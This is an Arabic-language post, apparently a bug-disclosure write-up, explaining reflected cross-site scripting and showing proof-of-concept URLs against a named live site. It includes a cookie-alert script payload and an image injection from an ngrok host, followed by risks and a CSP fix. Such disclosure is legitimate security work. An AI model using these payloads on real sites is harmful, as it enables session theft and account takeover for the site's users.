ماهي ثغرة Cross-site Scripting (XSS) - Reflected ؟ تحدث ثغرة XSS عندما يسمح موقع الويب بتنفيذ اكواد جافاسكربت في متصفح المستخدم الذي يزور الموقع , لذالك يقوم المهاجم باستغلال هذا الخطأ لتنفيذ اكواد خبيثة في متصفح الضحية وسرقة ملفات Cookies وغيرها من البيانات ... خطوات اكتشاف ثغرة Reflected XSS في موقع bounceshare.com : 1. نقوم بفتح الرابط التالي : كود: https://covid.bounceshare.com/covid19?p= 2. نقوم بحقن السكربت في الباراميتر p : كود: <script>alert(document.cookie)</script> 3. سيتم تنفيذ السكربت وعرض ملف cookies POC1 : Proof OF Concept كود: https://covid.bounceshare.com/covid19?p=<script>alert(document.cookie)</script> Source Code كود: Line 465: <div id="freemarker_location" hidden><script> alert(document.cookie)</script></div> POC2 حقن صورة في الموقع : كود: https://covid.bounceshare.com/covid19?p=</div><img src="https://111697rt098e.ngrok.io/Hacked2.jpg" width="" height=""> POC3 Video ## يمكنك متابعة شرح الفيديو .. أضغط هنا ## خطر الثغرة : يستطيع المهاجم استغلال الثغرة وسرقة ملفات cookies من الضحية والاستيلاء على الحساب , وتنفيذ اكواد جافاسكربت للتجسس على الضحية مثل keylogger, وتغيير شكل الصفحة والتعديل عليها واضافة صور وفيديو ويمكن تحويل الضحية الى مواقع اخرى ... كيف يتم اصلاح الثغرة : نقوم باستخدام Content Security Policy (CSP) لمنع تنفيذ اي سكربت ضار المراجع : https://portswigger.net/web-security/cross-site-scripting
